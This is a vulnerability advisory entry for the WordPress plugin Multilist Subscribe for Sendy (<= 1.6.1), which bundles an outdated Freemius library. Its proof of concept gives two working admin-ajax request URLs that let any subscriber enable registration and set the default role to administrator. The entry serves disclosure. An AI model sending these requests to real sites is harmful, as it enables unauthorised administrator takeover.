Multilist Subscribe for Sendy <= 1.6.1 – Subscriber+ Arbitrary Options Update | Plugin Vulnerabilities

Description

The plugin is using an outdated version of the Freemius library (1.2.2.9), which is known to be affected by a security issue allowing any authenticated users, such as subscriber to set arbitrary blog options

Proof of Concept

As any authenticated user:

Enable new user registrations: https://example.com.local/wp-admin/admin-ajax.php?action=fs_set_db_option&option_name=users_can_register&option_value=1

Set the default role for new user registrations to Administrato: https://example.com/wp-admin/admin-ajax.php?action=fs_set_db_option&option_name=default_role&option_value=administrator

Affects Plugins

multilist-subscribe-for-sendy

No known fix

Classification

Type

PRIVESC

OWASP top 10

A2: Broken Authentication and Session Management

CWE

CVSS

Miscellaneous

Original Researcher

0xdecafbad

Submitter website

https://vuln.farm

Verified

Yes

WPVDB ID

e958e1cc-81a6-4613-8e68-b9607c6043f5

Timeline

Publicly Published

2022-03-01 (about 4 years ago)

Added

2022-03-01 (about 4 years ago)

Last Updated

2022-03-01 (about 4 years ago)

Other

Published

Title

Published

2026-04-07

Title

iControlWP < 5.5.4 - Unauthenticated Privilege Escalation

Published

2024-12-19

Title

SSL Wireless SMS Notification < 3.7.0 - Unauthenticated Privilege Escalation

Published

2025-07-08

Title

Responsive Coming Soon Landing Page / Holding Page for WordPress <= 3.0 - Authenticated (Susbcriber+) Privilege Escalation

Published

2025-01-03

Title

Accessibility by AllAccessible < 1.3.5 - Subscriber+ Privilege Escalation

Published

2024-10-09

Title

UserPlus <= 2.0 - Editor+ Registration Form Update to Privilege Escalation